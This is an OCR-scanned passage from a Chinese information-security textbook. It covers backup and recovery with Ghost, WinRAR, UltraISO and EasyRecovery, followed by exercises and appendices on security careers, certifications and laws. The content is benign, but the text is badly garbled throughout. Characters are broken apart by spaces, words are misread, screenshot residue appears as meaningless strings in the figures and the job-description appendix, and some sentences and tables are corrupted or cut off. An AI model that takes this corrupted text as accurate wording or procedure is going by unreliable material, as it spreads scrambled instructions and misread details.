当 感觉 系 统 运行 缓慢 时 (此 时 多 半 是 由 于 经 常安 装 印 载 软件 ,残留 或 误 删 了 一 些 文 
NE, FRRREKKO .系统 崩溃 时 或 中 了 比较 难 杀 除 的 病毒 时 ,就 要 进行 系统 恢复 了 。 

3) 备份 /恢复 分 区 数据 

4) 磁盘 碎片 整理 

有 时 如 果 长 时 间 没 整理 磁盘 碎片 ,又 不 想 花 长 时 间 整 理 时 ,也 可 以 先 备份 该 分 区 , 然 
后 再 恢复 该 分 区 ,这样 比 单纯 磁盘 碎片 整理 速度 要 快 。Ghost 备份 分 区 时 ,会 自动 跳 过 分 
区 中 的 空白 部 分 ,只 把 数据 写 到 . gho 映像 文件 中 。 人 恢复 分 区 时 ,Ghost 把 . gho 文件 中 的 
内 容 连 续 写 人 分 区 ,因此 该 分 区 中 就 不 存在 磁盘 碎片 。 

5) 修复 PQ 分 区 产生 的 错误 

当 使 用 PQ 工具 分 区 失败 后 ,会 导致 分 区 (假如 是 下 盘 ) 中 的 文件 消失 ,此 时 可 以 考虑 
用 Ghost 试 着 解决 该 问题 。 先 进入 Ghost, 依 次 选择 Local 一 Check 一 Disk( 字 体 变 白色 ， 
注意 ,一 定 不 要 选 错 ) , 按 回 车 键 ,开始 检测 。 如 果 检 测 进程 发 现 原 分 区 中 的 文件 , 找 回 数 
据 就 有 希望 。 先 用 Ghost 把 F 盘 做 一 个 镜像 文件 保存 在 下 盘 ,然后 将 下 盘 格 式 化 ,接着 
用 Ghost Explorer 打开 镜像 文件 ,把 其 中 的 文件 提取 到 下 盘 。 

3. 实例 : 用 Ghost 备份 分 区 (系统 ) 

下 面 以 备份 C 盘 为 例 介 绍 Ghost 的 使 用 ,实例 中 的 截图 是 在 Windows 下 运行 Ghost 
1 截取 的 ,读者 需要 根据 实际 情况 选用 Windows 版 Ghost 或 者 DOS 版 Ghost, 

CD 第 1 步 : 使 用 工具 盘 ( 比 如 番茄 花园 /雨林 木 风 / 深 度 安 装 盘 ) 进 入 Ghost, 或 者 进 
入 DOS, 在 命令 行 执行 Ghost. exe 命令 ,启动 Ghost 之 后 ,显示 如 图 10. 1 所 示 的 画面 。 
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(2) 58 2 2b . 在 图 10.1 中 , 单 击 OK 按钮 。 如 果 没 有 鼠标 ,可 以 使 用 键盘 进行 操作 : 
Tab 键 进行 切换 、 方 向 键 进行 选择 、 回 车 键 进行 确认 。 主 程序 有 四 个 可 用 选项 : Quit GR 
出 )、Help( 帮 助 )、Options( 选 项 ) 和 Local( 本 地 )。 在 菜单 中 单 击 Local 项 ,在 右面 弹出 的 
菜单 中 有 3 个 子 项 ,其 中 Disk 表示 备份 整个 硬盘 ( 即 硬盘 克隆 ) ,Partition 表示 备份 硬盘 
的 单个 分 区 ,Check 表示 检查 硬盘 或 备份 的 文件 ,查看 是 否 可 能 因 分 区 、 硬 盘 被 破坏 等 造 
成 备份 或 还 原 失败 。 这 里 要 对 本 地 磁盘 进行 操作 ,应 选 Local; 当 前 默认 选中 Local( 字 体 
变 白色 ) , 按 向 右 方向 键 展开 子 菜单 ,用 向 上 或 向 下 方向 键 选择 ,依次 选择 Local( 本 地 ) 一 
Partition( 分 区 ) 一 To Image( 产 生 镜 像 ) ,如 图 10. 2 所 示 。 


10.2 操作 菜单 
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G) 第 3 步 : 选择 硬盘 ,直接 按 Enter 键 后 ,显示 如 图 10. 3 所 示 的 画面 。 


图 10.3 选择 本 地 硬盘 


(4) 第 4 步 : 在 图 10.4 中 ,选择 要 备份 的 分 区 ,然后 单 击 OK 按钮 ,显示 如 图 10. 5 所 
示 的 画面 。 


图 10.4 选择 要 备份 的 分 


风 


(5) 第 5 步 : 在 图 10.5 中 ,选择 镜像 文件 存放 的 位 置 ,输入 镜像 文件 名 (WinBac) , 然 
后 单 击 Save 按钮 ,显示 如 图 10. 6 所 示 的 画面 。 
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Tupesb [Fat32], 6000 NB, 3896 MB used, SYSTEM. 
from Local drivs 2626 MB 
Local file H:\MinxpBac.6H0 


LJ 


图 10.6 单 击 Fast 按钮 开始 备份 


(6) 第 6 步 : 在 图 10.6 中 ,给 出 3 个 选择 。 

No: 表示 终止 压缩 备份 操作 。 

Fast; 表示 压缩 比例 小 但 是 备份 速度 较 快 ,一 般 情况 推荐 该 操作 。 

High: 表示 压缩 比例 高 但 是 备份 速度 很 慢 , 如 果 不 是 经 常 执行 备份 与 恢复 操作 ,可 选 
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单 击 Fast 按钮 ,整个 备份 过 程 一 般 需 要 几 分 钟 到 十 几 分 钟 不 等 ,具体 时 间 与 要 备份 
分 区 的 数据 多 少 以 及 硬件 速度 等 因素 有 关 , 备 份 完 成 后 将 提示 操作 已 经 完成 , 按 Enter 键 
后 返回 到 Ghost 程序 主 画 面 ,要 退出 Ghost, 选 择 Quit TZ Enter 键 。 

备份 系统 分 区 之 后 ,就 不 需 担心 因 试用 某 个 软件 或 修改 系统 的 某 些 参数 导致 系统 崩 
溃 。 如 果 崩 溃 , 也 能 迅速 将 系统 恢复 成 原始 状态 ,无 须 重新 安装 程序 或 系统 。 


10.2.2 ”大 数据 量 备份 技术 简介 


在 实际 生活 中 ,电脑 的 资料 是 越 来 越 多 ,如 何 管理 大 量 的 数据 资料 ,是 很 多 人 要 面 对 
的 难题 。 在 实际 工作 中 ,可 以 采用 以 下 方法 备份 “二 
大 量 的 数据 文档 资料 。 工 具 如 下 。 
。 WINRAR 压缩 软件 的 作用 : 较 小 文档 资 
料 压缩 。 
。 UltraISO 软 碟 通 的 作用 : 光盘 制作 软件 ; 
读 取 光 盘 内 容 。 
* LS 文件 列表 生成 器 。 
方法 步骤 如 下 : 
CD 首先 使 用 LS 文件 列表 生成 器 将 备份 文 
件 生成 目录 ,如 图 10. 7 所 示 ,方便 后 期 查询 查看 
查找 资料 文档 。 软 件 使 用 方便 , 自 定 义 生成 文件 
列表 形式 。 选 择 要 生成 列表 的 文件 夹 , 设 置 “ 搜 
索 此 文件 夹 " “搜索 条 件 ” “输出 文件 格式 ”和 
“保存 列表 到 ”的 内 容 , 单 击 “ 开 始 ”, 生 成 目录 ,如 图 10.7 LS 文件 列表 生成 器 备份 
图 10. 8 所 示 。 文件 生成 目录 


leje Je jei 


Ru Eaa aperi ble yee 
AE SEO) É Eee Speseurt. Fine] C Striechisla STI pat 


10.8 LS 文件 列表 生成 器 生成 的 目录 文件 
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dat 
Operate .ini 

[skins 

souno 
AAF 2008) [HR -exe 
CServer.dat 
QQury.dat 
active.bnp 


controls.bnp 
hw.bnp 
inactive.bnp 
main.bnp 
mask -bmp 


nenuitens.bnp 


toolvindowactive.bnp 
toolvindownask.bnp 
downfile .wav 
login.wav 

offline uav 
setting.wav 
upfile.wav 


eE e 
图 10.8 ( 续 ) 


(2) WinRAR 压缩 软件 对 于 小 文件 的 保存 备份 很 有 帮助 ,发 送 邮 件 时 打包 压缩 减少 
文件 数量 ,但 是 对 于 大 量 的 数据 备份 和 读 取 显 得 力不从心 .效率 低 。 如 果 直 接 双 击 文件 读 
取 压 缩 包 时 间 长 ,将 文件 释放 到 缓存 空间 然后 打开 ,时 间 较 长 。 如 果 全 部 解压 文件 到 文件 
夹 ,将 占用 电脑 硬盘 空间 ,同时 浪费 时 间 。 系 统 中 安装 WinRAR 压缩 软件 后 ,直接 右 击 文 
JF ,选择 “添加 压缩 文件 (A)…”, 出 现 图 10. 9 界面 ,设置 后 单 击 确定 , 即 可 生成 压缩 文件 ， 
如 图 10. 10 所 示 。 


图 10.9 压缩 文件 设置 界面 
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BIS-1.53 JI Xi aTaiBe ”文件 天 10:52 
(QS 12008 文件 来 2015-2-11 11:20 
4,405 KB WinRAR 压缩 文件 2015-2-12 11:04 A 


图 10.10 压缩 后 的 文件 


(3) 使 用 UltralSO 软 碟 通 制作 光盘 映像 

UltraISO 软 碟 通 是 一 款 光 盘 映 像 ISO 文件 编辑 制作 工具 , 它 可 以 图 形 化 地 进行 光 
盘 、 硬 盘 制 作 和 编辑 ISO 文件 。 

CD 启动 UltralSO, 如 图 10. 11 所 示 。 


外 UltraISO (试用 版) 
文件 中 WEND BWP IAT) 选项 D) 帮助 00 


DE- tle os | E ee: 
me [ Tus | 


DX DW 


An 


> 
DEXKG EEA Tana and Settingr\Adninistrator My Docwments Wy 150 1] 


文件 各 xA BH MM/ 时 间 


E SE Wa t-0592004b28\SharedDocs 


« à 上 »| 
版 权 所 有 人 c)2002-2014 EZB Systems, Inc. 光盘 目录 ; 0 文件 ，0 好 


图 10.11 UltraISO 界面 


© 打开 UltraISO 软 碟 通 加 载 需要 备份 的 文档 ,然后 进行 另存 为 ISO 格式 。 在 
UltraISO 界面 左下 角 的 “本 地 目录 ”里 定位 到 桌面 上 的 “交换 机 资料 ”文件 夹 , 它 里 面 的 所 
有 文件 会 在 右 下 角 显 示 , 把 要 加 入 ISO 镜像 的 所 有 文件 选中 后 按 住 鼠标 左 键 拖 到 右上 角 
的 区 域 , 如 图 10. 12 所 示 。 

© 生成 光盘 映像 ,如 图 10. 13 所 示 ,保存 备 份 。 单 击 “ 文 件 ” 菜 单 下 的 “保存 ”或 “另存 
为 ”保存 修改 后 的 ISO 镜像 ,如 图 10. 14 所 示 。UltralSO 软 碟 生成 大 量 数据 光盘 映像 速 
度 较 快 ,7G 左右 资料 5 一 6 分 钟 便 可 生成 。 如 果 你 的 计算 机 配置 较 高 ,速度 将 会 更 快 
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t) 20150213 090924 "s 日 期/ 时 间 
CEENEUE 2006-09-12 11 
2005-09-12 11 
2005-09-12 11 
2006-09-12 11 
2008-09-12 11 
2009-09-12 i1 
2006-09-12 11 
2006-09-12 11 
2006-09-12 11 
2009-09-12 11 
实验 10Bootr on 下 的 升 绍 卫 置 pdf pat 文件 2006-09-12 11 
< 一 一 -一 


MOa RG A :WE Een ad Settinerdeinistretor AE 


文件 名 — . amaa — 
Chrome non, defe Yt 2013-04-08 10:28 
2013-04-08 14:00 
2013-04-08 10:19 
2013-09-04 16:39 
2015-02-13 09:11 
2015-02-13 08:52 
Sf Nard t-0592e04b28\Shar edocs boxe odiis 
(tup sini-19095. , 2013-04-08 11:02 
Chrome non, defasl tV, tar 1 2013-04-08 10:28 
a à i| Quncis-ssso X APERYI. 8. 1.150. 1 2011-05-27 00:00 


版 权 所 有 (eJ2002-2014 Ez Systems, Inc. 光盘 目录 - « xit iw 本 地 目录 :14 文件 ，639 Mb 


图 10.12 加 载 需要 备份 的 文档 


e IItraISO 《试用 版 ) 


HAND. 
标准 ISO ICPF Ce. iso) 


版 权 所 有 (c)2002-2014 EZB Systems, Inc. 光盘 目录 : 46 xi 13B 本 地 目录 ; 0 文件 0 x» 


10.13 生成 光盘 映像 
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IPD REO FEV BRW IAD EHU 

Q=- O0- B prn per ma 

Ht Q0 [C3 C:\Docusents and Settings\Adnini strater\ 点 面 \ 交 的 机 资料 v Eu 
TANEH. iso zmoxenme — ^ 
Weis) 文件 a| Es. 

tj 13,162 K PDF 文件 


"EL dm 


nes To 文件 


à OIREET - nisi 


EM 加 | eios E i d 
mie maer mss 


DP 文件 mr 文件 rx 


图 10.14 已 经 生成 的 光盘 映像 一 


CD 查找 文档 , 读 取 资 料 。 通 过 UltraISO 软 碟 通 或 者 DAEMON_Tools 虚拟 光驱 ,加 
载 光盘 映像 ,打开 我 们 前 期 制定 的 文件 列表 ,直接 查找 需要 的 信息 即 可 。 单 击 界 面 左 上 角 
的 “打开 ”图 标 (或 直接 使 用 快捷 键 Ctrl 十 O) ;找到 ISO 文件 所 在 路 径 ,双击 打开 ,如 图 10. 15 
所 示 。 


查找 范围 @): [gx E oso 


(C31E8 ZHCN YINTEB 
(© jre-TuT-windows-i588 


| O Chrome_non_defaul t4 
— UJ aste test 


X COSS 
我 的 文档 
我 的 电脑 
网 上 邻居 
XE QD: DCRS-5950 系 列 手册 V1.8. 1. ISO. * [ iO ] 


文件 类 型 四。 [ERRA e. isot isz:+t binc cec 国 (mA 


图 10.15 已 经 生成 的 光盘 映像 二 


C) 提取 文件 选中 想 要 的 单个 文件 或 多 个 文件 提取 到 指定 的 文件 夹 即 可 ,如 
图 10.16 所 示 。 加 载 虚 拟 光驱 ,速度 快 ,方便 快捷 。 找 贝 文档 时 比 拷贝 多 个 文档 速 
度 快 .效率 高 。 
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C:\Documents and Settings\ádministrator\RM\DCRS-59504 AFM... 此 | 器 | 区 | 


合 呈 traI50 (试用 版 ) - 
文件 下) 操作 CA) 启动 IAM iO) 帮助 00 


日 期/ 时 间 

2010-03-18 17:20 
2010-03-18 17:22 
2010-03-18 17:20 
2010-03-18 17:14 


jS 设置 为 引导 文件 
ESLI 


E S t-test Sarees 


图 10.16 提取 文件 


10.3 数据 恢复 技术 


10.3.1 实践 案例 10-2: 操作 系统 恢复 
以 下 以 Ghost 为 例 介 绍 操作 系统 的 恢复 方法 。 
CD 第 一 步 : 在 图 10. 17 中 ,依次 选择 Local 一 Partition 一 From Image( 字 体 变 白色 ， 
注意 ,一 定 不 要 选 错 ) ,然后 按 Enter 键 ,显示 如 图 10. 17 所 示 的 画面 。 


图 10.17 选择 镜像 文件 
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(2) 第 二 步 : 在 图 10. 17 中 ,选择 系统 镜像 文件 (WinBac. GHO) ,然后 单 击 Open f£ 
钮 ,在 随后 显示 的 画面 中 单 击 OK 按钮 ,显示 如 图 10. 18 所 示 的 画面 。 


图 10.18 选择 目的 硬盘 


G) 第 三 步 : 在 图 10. 18 中 ,因为 本 系统 只 有 一 块 硬盘 ,所 以 不 用 选择 硬盘 ,直接 按 
Enter 键 后 ,显示 如 图 10. 19 所 示 的 画面 ,选择 要 恢复 到 的 分 区 , 单 击 OK 键 。 


图 10. 19 选择 目的 硬盘 中 的 分 区 


(4) 第 四 步 : 在 图 10. 19 中 , 单 击 OK 按钮 ,开始 恢复 分 区 。 人 恢复 完成 后 E 
算 机 即 可 ,如 图 10. 20 所 示 。 
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ised, Me name 
1.6805T11**» ^2 WinBac. 60, 102 Mb 


图 10.20 是 否 恢 复 分 区 


10.3.2 ”实践 案例 10-3: 数据 恢复 软件 使 用 


1. EasyRecovery 软件 介绍 

EasyRecovery 是 数据 恢复 公司 Ontrack 的 产品 , 它 是 一 个 功能 强大 而 且 非 常 容易 使 
用 的 数据 恢复 工具 , 它 可 以 快速 地 找 回 被 误 删除 的 文件 或 者 文件 夹 , 支 持 FAT 和 NTFS 
文件 系统 。 

2. 使 用 EasyRecovery 软件 恢复 被 删除 的 文件 

CD 右 击 下 盘 ,选择 “格式 化 ”, 将 下 盘 格 式 化 为 NTFS 格式 ,如 图 10. 21 所 示 。 

(2) f£ E BF iE — A. txt 文件 输入 任意 字符 ,保存 
文件 后 按 Shift 十 Delete 键 将 其 删除 ,如 图 10. 22 所 示 。 

(3) 启动 EasyRecovery, 选 择 “ 数 据 恢复 /删除 恢复 ”， 
如 图 10. 23 所 示 。 

(4) 对 下 盘 进 行 扫描 。 单 击 * 删 除 恢复 ?之 后 会 出 现 
图 上 的 对 话 框 ,左边 是 现 有 的 磁盘 分 区 ,右边 是 扫描 的 文 
件 类 型 ,选择 要 恢复 文件 所 在 的 分 区 之 后 单 击 下 一 步 便 可 
进行 快速 扫描 ,假如 你 需要 对 分 区 进行 更 彻底 地 扫描 ,就 

“完全 扫描 ”前 打上 勾 就 行 , 选 择 好 分 区 后 ,我们 单 击 * 下 

一 步 ”, 如 图 10. 24 所 示 。 

(5) 恢复 文件 。 扫 描 完 成 后 ,可 以 看 到 左边 的 文件 夹 ， 
此 时 单 击 刚 才 删 除 的 文件 夹 , 在 右面 列 出 来 的 文件 就 是 能 
被 恢复 的 删除 文件 ,选择 一 个 要 恢复 的 文件 ,在 文件 前 面 
打上 勾 即 可 ,然后 单 击 “ 下 一 步 ”, 如 图 10. 25 所 示 。 


10.21 格式 化 E 盘 
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DNE KELB. trt - II 


Æ 10.22 新 建 一 个 . txt 文件 


删除 恢复 
[tein ib sesssomexe 


文件 修复 


从 格式 化 过 的 卷 中 恢复 忽略 任何 文件 系统 信息 
文件 进行 恢复 


格式 化 恢复 、、 Raw 恢复 
L 


软件 升级 


救援 中 心 
紧急 启动 盘 
创建 自 引导 暴 急 启动 盘 


图 10.23 数据 恢复 /删除 恢复 
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(Ontack an。 一 一 ea 


请 选择 一 个 分 区 以 恢复 刚 除 的 文件 ARER FE” AAE: 选择 “取消 ”退出 本 工具 


(V) 无 法 识别 (1.22 MB) 


(t:X) NTFS (39.99 GB) 


(V) FAT 32 (42.00 MB) 
(5:3) NTFS (50.00 Mb) 


图 10.24. 恢复 文件 所 在 分 区 


m'ERUERCAS ni “下 一 步 ” 进入 选择 目标 选择 对 话 框 ; 选择 “上 一 步 ” 回 到 选择 分 区 对 


图 10.25 选择 被 恢复 的 文件 


选择 好 要 恢复 的 文件 后 就 来 选择 恢复 目标 的 选项 ,一 般 都 是 恢复 到 本 地 驱动 器 里 的 ， 
此 时 需要 注意 的 是 恢复 的 文件 保存 路 径 不 能 与 原来 的 保存 分 区 一 致 ,否则 不 能 保存 ,如 
图 10. 26 和 图 10. 27 所 示 。 

(6) 恢复 完成 后 检查 恢复 后 的 文件 是 否 与 删除 的 文件 一 致 。 

3. 恢复 被 格式 化 分 区 的 文件 

CD 在 E 盘 新 建 一 个 . txt 文件 ,输入 任意 字符 后 保存 。 然 后 格式 化 下 盘 为 FAT32 
格式 ,如 图 10. 28 所 示 。 
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“保存 ”以 保存 恢复 摘要 到 文件 。 选择 “上 一 步 ”加 到 复制 目标 对 


[Ontrack EasyRecovery - 司 
权 所 有 p 2002-2015 Ontrack Data Recovery 有 限 公司 
告 创建 于 2/13/2015 @ 9:35 PM 


驱动 器 : VMware, VMware Virtual S10 
WE EA <> 
1 个 文件 被 选中 以 进行 恢复 。 

字 节 的 数据 需 恢复 。 

据 恢复 至 Ce 
1 个 文件 已 恢复 。 
字 节 的 数据 已 恢复 。 


图 10.27 文件 恢复 


(2) 启动 EasyRecovery, 选 择 “ 数 据 恢复 /格式 化 恢复 ”, 并 在 “先前 的 文件 系统 ”下 
拉 框 中 选择 NTFS 即 格式 化 前 的 文件 系统 格式 , 单 击 * 下 一 步 ? 进 行 扫描 ,如 图 10. 29 
所 示 。 

(3) 选择 要 恢复 的 文件 ,如 图 10. 30 所 示 , 单 击 * 下 一 步 ”。 选 择 恢 复 目标 的 选项 ,一 
般 都 是 恢复 到 本 地 驱动 器 里 ,此 时 需要 注意 的 是 恢复 的 文件 保存 路 径 不 能 与 原来 的 保存 
分 区 一 致 ,否则 不 能 保存 。 
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10.28 新 建 一 个 . txt 文件 


G:N 无 法 识别 (1.22 MB) 
(c:) NTFS (39.99 GB) 


Q:V) FAT 32 (42.00 MB) 


2a ) 
(XUI eon n 前 文件 系统 下 拉 荣 单 多 许 作为 您 的 分 区 选择 先前 使 用 的 文件 系统 


图 10.29 选择 要 恢复 的 分 区 


第 10 章 ” 容 灾 与 备份 


2/12/2015 
IL] 39720. 2/12/2015 
OE Syste Volume Tafornati | 回 aoo x 2/13/2015 


DIC systen Volume Informati 


图 10.30 选择 要 恢复 的 文件 
(4) 扫描 完毕 后 选择 需要 恢复 的 文件 进行 恢复 ,并 检查 恢复 后 的 文件 。 


10.4 课 后 体会 与 练习 


1. 填空 题 

a) 是 指 在 发 生 灾难 性 事故 时 ,能 够 利用 已 备份 的 数据 或 其 他 手段 ,及 时 对 
原 系统 进行 恢复 ,以 保证 数据 的 安全 性 以 及 业务 的 连续 性 。 

(2) 威胁 数据 的 安全 ,造成 系统 失效 的 主要 原因 有 和 等 。 

(3) 容 灾 可 以 分 为 3 个 级 别 : T 和 

(4) 一 个 完整 的 容 灾 系 统 应 该 包含 3 个 部 分 : 和 " 

C5) 对 于 容 灾 系 统 来 说 ,所 包含 的 关键 技术 有 \ 灾 难 检测 .系统 迁 
移 和 灾难 恢复 5 个 方面 。 

(6) 建立 容 灾 备 份 系统 时 会 涉及 多 种 技术 ,如 和 等 。 

2. 思考 与 简 答题 


(1) 简 述 容 灾 的 重要 性 。 
D 简 述 容 灾 的 级 别 及 其 含义 。 
(3) 简 述 容 灾 计 划 所 包括 的 一 系列 应 急 计划 。 


附录 A 信息 安全 相关 职业 


信息 安全 技术 适用 领域 很 大 ,从 国家 军事 政治 等 机 密 安全 ,到 防范 商业 企业 机 密 泄 
露 ,防范 青 少年 对 不 良 信息 的 浏览 以 及 防范 个 人 信息 的 泄露 等 都 需要 信息 安全 方面 的 人 
才 。 其 具体 工作 部 门 或 行业 可 包括 : 政府 机 关 、 国 家 安全 部 门 . 军队、 学 校 . 银 行 、 金 融 、 证 
券 .交通 和 住宿 等 ,几乎 包含 所 有 的 行业 。 

信息 安全 具体 的 职业 岗位 名 称 并 没有 统一 标准 ,有 些 单位 的 信息 安全 人 员 还 可 能 是 
由 近似 的 工作 岗位 人 员 兼 任 , 结 合 典型 的 招聘 网 站 、 知 名 安全 技术 网 站 及 论坛 .企业 信息 
安全 相关 职位 HR( 人 力 资源 ) 和 企业 信息 安全 相关 从 业 人 员 等 各 方面 的 调查 ,得 出 信息 
安全 相关 职业 (岗位 ) 如 下 。 

1. 安全 测试 方向 

安全 服务 工程 师 、 信 息 安 全 咨询 顾问 、 渗 透 测试 工程 师 、 网 络 安 全 工程 师 、 网 络 安全 研 
究 员 、Web 安全 工程 师 、 安 全 架构 师 、 安 全 分 析 人 员 ,安全 检测 工程 师 、 安 全 运 维 工程 师 和 
游戏 安全 测试 工程 师 。 

2. 网 络 方向 

技术 服务 工程 师 、 网 络 工程 师 、 技 术 支 持 工 程 师 、 网 络 优化 工程 师 、 硬 件 工程 师 、 事 业 
部 产品 经 理 , 销 售 经 理 、 销 售 工程 师 ( 客 户 线 ) 和 销售 工程 师 (产品 线 ) 等 。 

3. 编程 开发 方向 

信息 安全 研发 工程 师 、 网 络 安全 研发 工程 师 、 软 件 工程 师 、 反 病毒 工程 师 、 逆 向 工程 
师 、 加 解密 研发 工程 师 和 软件 销售 经 理 等 。 

4. 其 他 

内 核 开 发 工程 师 、 驱 动 开 发 工程 师 、. NET TREI, PHP 工程 师 和 数据 库 开发 工程 
师 等 。 


附录 B 信息 安全 职业 能 力 


从 事 不 同 的 信息 安全 职业 (岗位 ?所 要 求 的 职业 能 力 有 很 大 区 别 , 但 有 一 些 是 从 事 信 
息 安全 相关 职业 所 共同 要 求 的 ,主要 包括 以 下 几 点 。 

1. 基础 知识 部 分 

要 求 掌 握 网 络 及 网 络 运 维 知识 、 常 用 网 络 协议 .常见 的 服务 器 应 用 架构 知识 ,对 常见 
的 操作 系统 平台 、 网 络 设备 .数据库 `.Web 应 用 、 渗 透 测试 流程 ,企业 应 用 有 一 定 程 度 的 掌 
握 ; 热 悉 至 少 一 门 高 级 编程 语言 ,能 够 熟练 进行 程序 编写 ,熟练 掌握 至 少 一 种 脚本 语言 , 熟 
悉 常 见 的 安全 漏洞 等 。 


2. 英语 能 力 
能 进行 一 般 能 力 的 阅读 和 写作 。 
3. 可 持续 发 展 能 力 


需要 较 强 的 学 习 能 力 和 动手 实践 能 力 ， 良好 的 文档 组 织 能 力 、 书 面 与 口头 表达 能 力 ， 
良好 的 沟通 能 力 及 高 度 的 责任 心 等 ,具体 见 附 图 B-1 所 示 。 


职位 描述 公司 介绍 


IFMA: 

1 ARORAA, Ho Sep fosa. 

2 在 出 现 PS 牙 击 或 安全 事 作 时 ， 提 供 昼 着 响 应 骤 务 ,帮助 用 户 恢复 系统 及 调查 取证 ; 
3 针对 客户 网 阁 奈 构 ， 建 议 合理 的 S 实 全 解 冯 方 委 ! 

4 RBBRUREPENSEPER. 


APERIRA; 
应 用 系统 , 如 : L, 


HPAES. DS. DAS RAHAT 
Ki CEN. DS. BERSED 的 安全 评估 和 加 固 ; 


5. ARS. MH Rit MEESE, MEA, CCNP, CCIE, CISP, CISSP, SN 等 认证 者 优 和 寺 专 
E. 


附 图 B-l 信息 安全 技术 工程 师 职 位 描述 


附录 C 信息 安全 职业 资质 


职业 资质 也 称 之 为 职业 资格 ,对 从 事 某 一 职业 所 必 备 的 学 识 、 技 术 和 能 力 的 基本 要 
求 。 信 息 安全 技术 的 职业 资格 一 般 由 学 历 ( 学 位 ) 证 书 、 英 语 ( 外 语 ) 等 级 证 书 \ 行 业 证 书 等 
构成 ,用 来 证 明 从 业者 从 事 本 职业 的 能 力 。 

其 中 行业 证 书 , 尤 其 是 计算 机 行业 证 书 , 种 类 极其 繁杂 ,从 学 生 的 角度 而 言 , 可 以 考虑 
的 证 书 主要 有 以 下 几 个 。 

1. 全 国 计 算 机 等 级 考试 (NCRE) 

全 国 计 算 机 等 级 考试 三 级 以 上 的 科目 中 ,将 信息 安全 技术 作为 一 个 单独 的 方向 进行 
考试 认证 ,如 附 表 C-1 所 示 。 

附 表 C-1 NCRE 级 别 /科目 设置 (2013 版 ) 


级 别 科目 名 称 科目 代码 | 考试 时 间 考试 方式 
计算 机 基础 及 WPS Office 应 用 14 90 分钟 无 纸 化 
一 级 计算 机 基础 及 MS Office 应 用 15 90 分钟 无 纸 化 
计算 机 基础 及 Photoshop 应 用 16 90 分 钟 无 纸 化 
C 语言 程序 设计 24 120 分 钟 无 纸 化 
VB 语言 程序 设计 26 120 分 钟 无 纸 化 
VFP 数据 库 程 序 设计 27 120 分 钟 无 纸 化 
Java 语言 程序 设计 28 120 分 钟 无 纸 化 
二 级 Access 数据 库 程序 设计 29 120 分 钟 无 纸 化 
C++ 语言 程序 设计 61 120 分 钟 无 纸 化 
MySQL 数据 库 程序 设计 63 120 分 钟 无 纸 化 
Web 程序 设计 64 120 分 钟 无 纸 化 
MS Office 高 级 应 用 65 120 分 钟 无 纸 化 
网 络 技术 35 120 分 钟 无 纸 化 
数据 库 技 术 36 120 分 钟 无 纸 化 
三 级 软件 测试 技术 37 120 分 钟 无 纸 化 
信息 安全 技术 38 120 分 钟 无 纸 化 
嵌入 式 系统 开发 技术 39 120 分 钟 无 纸 化 
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续 表 

级 别 科目 名 称 科目 代码 | 考试 时 间 考试 方式 
网 络 工程 师 41 90 分钟 无 纸 化 
数据 库 工程 师 42 90 分钟 无 纸 化 
四 级 软件 测试 工程 师 43 90 分钟 无 纸 化 
信息 安全 工程 师 44 90 分钟 无 纸 化 
嵌入 式 系统 开发 工程 师 45 90 分钟 无 纸 化 


2. 计算 机 技术 与 软件 专业 技术 资格 (水 平 ) 考 试 

计算 机 技术 与 软件 专业 技术 资格 (水 平 ) 考 试 也 称 之 为 “软考 ”, 是 由 国家 人 事 部 和 信 
息 产业 部 联合 主办 的 国家 级 考试 ,其 目的 是 科学 、 公 正 地 对 全 国 计 算 机 技术 与 软件 专业 技 
术 人 员 进 行 职业 资格 、 专 业 技 术 资 格 认定 和 专业 技术 水 平 测试 。 考 试 的 权威 性 和 严肃 性 ， 
得 到 了 社会 及 用 人 单位 的 广泛 认同 。“ 软 考 ” 从 中 级 资格 开始 ,将 信息 安全 作为 一 个 单独 
的 分 类 进行 考试 ,计算 机 技术 与 软件 技术 资格 (水 平 ) 考 试 专业 类 别 、 资 格 名 称 和 级 别 对 应 
表 , 如 附 表 C-2 所 示 。 

附 表 C-2 计算 机 软考 类 别 ( 参 考 ) 


dk 项 | 计算 机 软件 类 [计算 机 网 络 类 | 计算 机 应 用 技术 类 | ”信息 系统 类 ”| 信息 服务 类 
信息 系统 项 目 管理 师 
nann RICE RETO 
(不 再 分 类 ) | E 
网 络 规划 设计 师 
系统 规划 与 管理 师 
信息 系统 监理 师 
ROTEN 多 媒体 应 用 设计 师 | 数据 库 系统 工程 师 | 信息 技术 支 
软件 设计 师 设计 师 | 信息 系统 管理 工 
BARRAUE 持 工程 师 
中 级 资格 | ( 原 高 级 程序 员 ) | 网 络 工程 师 | 设计 师 | 程 师 
计算 机 辅助 设计 师 计算 机 硬件 
软件 过 程 能 力 评 计算机 畏 动 设计 师 系统 集成 项 目 管理 | 计算 可 
m 工程 师 
信息 安全 工程 师 
程序 员 ( 原 初级 多 媒体 应 用 制作 技 | 信息 系统 运行 管 | 信息 处 理 技 
max A | 网 络 管理 员 RR be 术 员 
` 电子 商务 技术 员 网 页 制作 员 


3. IT 企业 原 厂 认证 

一 些 IT 行业 内 的 国际 知名 企业 会 进行 原 厂 认证 考试 ,这 些 认证 一 般 在 行业 内 会 有 
相当 大 的 影响 力 ,根据 从 业 人 员 获 取 的 不 同 级 别 的 资质 证 书 . 会 认定 其 从 事 相 关 岗 位 的 从 
业 能 力 。IT 行 业 比 较 权 威 的 认证 包括 微软 认证 体系 、Oracle 认证 体系 、Java 认证 体系 、 思 
科 认 证 体系 和 Redhat 认证 体系 等 ,每 一 种 认证 体系 的 侧重 点 实际 上 是 不 一 样 的 ,在 上 述 
认证 体系 中 ,思科 认证 对 信息 安全 进行 了 明确 的 分 类 ,其 著名 的 三 级 认证 模式 ,都 有 单独 
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的 安全 方向 ,如 附 表 C-3 所 示 。 


附 表 C-3 思科 认证 体系 (参考 ) 


认证 专业 方向 助 理 级 专业 级 专家 级 
路 由 交换 CCNA CCNP CCIE Routing & Switching 
网 络 安全 CCNA 安全 CCSP CCIE Security 
运营 商 CCNA CCIP CCIE Service Provider 
语音 CCNA 语音 CCVP CCIE Voice 
XX CCNA XA CCNP XX CCIE Wireless 
存储 网 络 CCNA CCNP CCIE Storage Networking 
m x CCNA Service Provider | CCNP Service Provider | CCIE Service Provider 
运营 商 运 维 Operations Operations Operations 
网 络 设计 CCDA CCDP CCDE 


附录 D 信息 安全 相关 
法 律 法 规 ( 部 分 ) 


序号 | 通用 法 律 法 规 名 称 来 源 说 明 生效 /实施 时 间 


1984 年 3 月 12 日 第 六 届 全 国人 民 代表 大 会 常务 委员 会 
中 华人 民 共 和 国 专 | 第 四 次 会 议 通过 ,根据 2008 年 12 月 27 日 第 十 一 届 全 国 
